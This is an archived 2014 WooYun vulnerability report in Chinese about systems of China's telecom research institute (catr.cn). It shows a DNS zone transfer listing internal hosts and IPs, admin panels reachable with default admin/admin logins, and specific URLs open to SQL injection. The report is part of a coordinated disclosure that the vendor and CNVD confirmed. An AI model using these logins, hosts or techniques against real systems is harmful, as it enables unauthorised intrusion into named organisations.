乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-16: 细节已通知厂商并且等待厂商处理中 2014-04-21: 厂商已经确认,细节仅向厂商公开 2014-05-01: 细节向核心白帽子及相关领域专家公开 2014-05-11: 细节向普通白帽子公开 2014-05-21: 细节向实习白帽子公开 2014-05-31: 细节向公众公开
一个DNS域传送漏洞引起的....
首先是发现工信部电信研究院的DNS域传送~
C:\Users\LeLe's>nslookup默认服务器: XAddress: X> set type=ns>> catr.cn服务器: XAddress: X非权威应答:catr.cn nameserver = dns.cci.cn.netcatr.cn nameserver = dns.catr.com.cndns.cci.cn.net internet address = 219.239.97.125dns.catr.com.cn internet address = 114.242.138.121> server dns.catr.com.cn默认服务器: dns.catr.com.cnAddress: 114.242.138.121> ls catr.cn[dns.catr.com.cn] catr.cn. NS server = dns.cci.cn.net catr.cn. NS server = dns.catr.com.cn catr.cn. A 219.239.97.40 #koa A 219.239.97.46 #mail A 219.239.97.60 acsi A 219.239.97.52 apectel49 A 219.239.97.126 apectelmra A 219.239.97.52 bbs A 219.239.97.22 blog A 219.239.97.113 broadband-m2m A 219.239.97.52 catrma A 219.239.97.64 catrmb A 219.239.97.65 ccicc A 219.239.97.52 certificate A 219.239.97.37 cff A 219.239.97.52 chinacc A 219.239.97.52 chinatcc A 219.239.97.52 chinatqac A 219.239.97.52 cim A 219.239.97.52 club A 219.239.97.113 clubnew A 219.239.97.22 elink.crp A 219.239.97.24 m.crp A 219.239.97.24 ctu A 219.239.97.52 data A 219.239.97.52 db A 219.239.97.85 down A 219.239.97.22 ecte A 219.239.97.52 english A 219.239.97.52 forum A 219.239.97.52 ftp A 219.239.97.28 ids A 219.239.97.23 iiinsight A 219.239.97.52 info A 219.239.97.52 ip A 59.108.230.35 ipc A 219.239.97.52 ipe A 219.239.97.52 ituchina A 219.239.97.52 ituchina-bbs A 219.239.97.50 localhost A 127.0.0.1 mail A 114.242.138.122 mail A 219.239.97.64 mailtest A 219.239.97.126 main A 219.239.97.52 manage A 219.239.97.52 market A 219.239.97.52 media A 219.239.97.52 mobileforum A 219.239.97.52 mstt A 219.239.97.80 news A 219.239.97.52 oldmail A 219.239.97.60 pdri A 219.239.97.52 pm A 219.239.97.52 policy A 219.239.97.52 pr A 219.239.97.52 report A 219.239.97.52 ritt A 219.239.97.52 sa A 219.239.97.52 search A 219.239.97.52 service A 219.239.97.52 shouji A 219.239.97.52 smtp1 A 114.242.138.123 sp A 219.239.97.52 spam A 219.239.97.34 standard A 219.239.97.52 stcte A 219.239.97.52 stic A 219.239.97.52 tcg A 219.239.97.52 tdlte A 114.242.138.108 tech A 219.239.97.52 teleinfo A 219.239.97.80 en.teleinfo A 219.239.97.80 tenaa A 219.239.97.52 test A 219.239.97.55 tlc A 219.239.97.52 tm A 219.239.97.52 tntcatr.cn A 219.239.97.52 top10 A 219.239.97.52 tousu A 219.239.97.53 ttl A 219.239.97.52 vaschina A 219.239.97.52 vast A 219.239.97.52 view A 219.239.97.52 vpn A 219.239.97.46 webpic A 219.239.97.52 wmail A 219.239.97.83 wt A 219.239.97.80 www A 219.239.97.52 xb A 219.239.97.52 xmldata A 219.239.97.63 zhaopin A 219.239.97.52 zxipr A 219.239.97.112 zxpsipr A 219.239.97.112
然后挨个测试....
数据监控系统 http://db.catr.cn/mainpage.aspx admin admin
项目招标信息平台 http://xmldata.catr.cn/indexReal.jsp admin admin
SQL注入 http://www.chinattl.com/ttlweb/display_A.aspx?id=2328 http://219.239.97.36/cn/showclass.asp?classid=187http://219.239.97.36/cn/showclass.asp?classid=39
http://219.239.97.51/chinacc/ShowArticle.asp?ArticleID=1847'owerEasy 错误 '800a000d'Type mismatch/chinacc/ShowArticle.asp,行3
不一一上图了....我发现的只是一小部分,很表面的东西....
...........我不会
危害等级:高
漏洞Rank:20
确认时间:2014-04-21 09:00
CNVD确认并复现所述六个漏洞情况,转由CNCERT通过部内联系渠道向工业和信息化部主管部门通报。
暂无